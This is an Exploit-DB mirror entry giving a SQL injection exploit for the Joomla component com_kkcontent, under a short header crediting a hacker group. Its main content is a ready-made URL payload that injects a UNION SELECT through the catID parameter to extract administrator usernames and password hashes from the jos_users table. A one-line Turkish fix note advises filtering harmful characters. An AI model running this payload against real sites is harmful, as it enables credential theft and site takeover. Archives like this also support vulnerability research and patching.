exploit-db-mirror/exploits/php/webapps/10790.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

30 lines
No EOL
835 B
Text

<------------------- header data start ------------------- >
#############################################################
# Joomla Component com_kkcontent Blind SQL Injection Vulnerability
#############################################################
# Author : Pyske
# Home : www.cyber-warrior.org
# Greetz : Fl0riX , M-K-A and All Cyber-Warrior
# Name : com_kkcontent
# Bug Type : Blind SQL Injection
# Infection : Admin login bilgileri al?nabilir.
# Bug Fix Advice : Zararli karakterler filtrelenmelidir.
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
path /index.php?option=com_kkcontent&catID=9/**/and/**/1=0/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users--
< -- bug code end of -- >